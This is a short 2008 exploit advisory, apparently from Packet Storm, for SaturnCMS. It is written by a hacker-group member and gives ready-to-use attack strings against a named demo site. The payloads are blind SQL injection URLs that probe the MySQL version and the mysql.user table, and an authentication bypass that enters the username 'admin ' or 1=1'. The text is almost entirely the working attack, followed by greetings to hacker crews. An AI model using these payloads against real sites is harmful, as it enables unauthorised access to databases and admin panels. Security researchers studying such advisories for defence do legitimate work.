saturncms-sql.txt

🗓️ 18 Nov 2008 00:00:00Reported by Hussin XType

packetstorm🔗 packetstormsecurity.com👁 23 Views

SaturnCMS Blind SQL Injection Vulnerability, script website download, demo gallery. Auth Bypass

`SaturnCMS (view) Blind SQL Injection Vulnerability  
___________________________________  
  
Author: Hussin X  
  
Home :IQ-SecuriTY > www.IQ-TY.com | TrYaG > www.TrYaG.cc  
  
Mail : [email protected]  
  
___________________________________  
  
script : http://www.saturncms.com/download  
  
Demo :  
_______  
  
http://demo.saturncms.com/gallery/web/view/22`  
  
true & false  
  
http://demo.saturncms.com/gallery/web/view/22+and+substring(@@version,1,1)=5  
http://demo.saturncms.com/gallery/web/view/22+and+substring(@@version,1,1)=4  
Version = 5 :)   
Table  
http://demo.saturncms.com/gallery/web/view/22+and+(SELECT 1 from mysql.user limit 0,1)=1  
  
  
Auth Bypass  
_______  
  
http://demo.saturncms.com/admin  
Username : admin ' or 1=1  
  
Password : milw0rm  
  
  
  
  
  
  
  
____________________________( Greetz )_________________________________  
|  
| All members of the Forum| WwW.IQ-ty.CoM | WwW.TrYaG.CC |  
|  
| My friends : DeViL iRaQ | IRAQ DiveR | IRAQ_JAGUR | CraCkEr | Sakab  
|  
| Ghost Hacker | FAHD | Iraqihack | jiko | str0ke | Cyber-Zone | G4N0K|  
|_____________________________________________________________________  
  
  
IM IraQi | IM TrYaGI   
  
`

18 Nov 2008 00:00Current

7.4High risk

Vulners AI Score7.4